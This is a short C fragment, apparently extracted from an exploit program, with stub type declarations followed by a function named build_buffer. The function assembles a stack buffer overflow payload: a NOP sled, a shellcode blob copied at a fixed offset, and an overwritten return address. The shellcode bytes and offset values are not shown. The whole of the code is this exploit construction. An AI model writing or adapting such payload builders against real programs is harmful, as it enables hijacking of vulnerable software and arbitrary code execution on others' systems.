
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 char NOP ;
 int OFFSET ;
 int memcpy (char*,unsigned long*,int) ;
 int memset (char*,char,int) ;
 unsigned long* shellcode ;
 int strlen (unsigned long*) ;
 int strtoul (char*,int *,int) ;

void build_buffer(char *buffer, unsigned long *buff_addr)
{

        memset(buffer, '\b', 1024);
        memset(buffer, '\0', 7);
        buffer[4] = '\x04';
        buffer[8] = '\xFE';


        memset(buffer + 9, NOP, strtoul(buffer, ((void*)0), 10) + OFFSET - strlen(shellcode) - 9);
        memcpy(buffer + OFFSET - strlen(shellcode), shellcode, strlen(shellcode));
        memcpy(buffer + OFFSET, buff_addr, 4);
        buffer[1023] = '\0';
        return;
}
